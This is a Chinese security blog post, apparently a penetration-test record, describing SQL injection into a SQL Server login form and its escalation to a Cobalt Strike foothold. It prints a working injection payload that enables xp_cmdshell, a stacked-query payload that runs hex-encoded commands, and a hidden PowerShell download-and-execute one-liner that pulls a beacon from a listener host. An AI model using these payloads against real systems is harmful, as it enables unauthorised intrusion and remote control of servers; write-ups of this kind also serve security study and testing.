sqlserver注入到cs上线

admin
admin
admin
138876
文章
114
评论
2022年3月17日09:53:25评论512 views字数 831阅读2分46秒阅读模式
随手记录一下项目挖洞的情况,因为是私密项目,脱敏之后,权当是公众号水文章了,也是顺带记录一下自己挖洞的历程,希望一天比一天进步,发过的文章就是最好的见证成长的记录。
狗头在上打码为敬

sqlserver注入到cs上线

一看这个界面就知道是老系统肯定存在很多问题随手一试发现万能密码直接登录成功

sqlserver注入到cs上线

其他端口测试发现数据库为sqlserver且是sa用户
尝试开启xp扩展

sqlserver注入到cs上线

Poc:uname=admin';EXEC master..sp_configure 'SHOW advanced options',1; RECONFIGURE WITH OVERRIDE; EXEC master..sp_configure 'xp_cmdshell',1; RECONFIGURE WITH OVERRIDE; EXEC master..sp_configure 'SHOW advanced options',0; RECONFIGURE WITH OVERRIDE---- &upwd=123123&EngState=1&ident=
发现成功准备上线cs服务器

sqlserver注入到cs上线

Poc:uname=admin';DECLARE @er VARCHAR(8000);SET @er=(需要hex编码一下);EXEC master..xp_cmdshell @er-- &upwd=123123&EngState=1&ident=


此处不知道哪里有问题网上在线的编码一直有问题推荐使用小葵编码工具

sqlserver注入到cs上线

此处就是我们需要的值
上线成功

sqlserver注入到cs上线

执行命令成功

sqlserver注入到cs上线


记录一下cs的操作步骤
1.设置监听
sqlserver注入到cs上线
2.一顿设置监听的方式还有内容
sqlserver注入到cs上线
3.看图
sqlserver注入到cs上线sqlserver注入到cs上线
4.生成命令结果
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.10.10:2112/a'))"
这里用的是powershell上线因为是Windows的
5.静待上线

本文始发于微信公众号(NOVASEC):sqlserver注入到cs上线

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年3月17日09:53:25
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   sqlserver注入到cs上线https://cn-sec.com/archives/495332.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息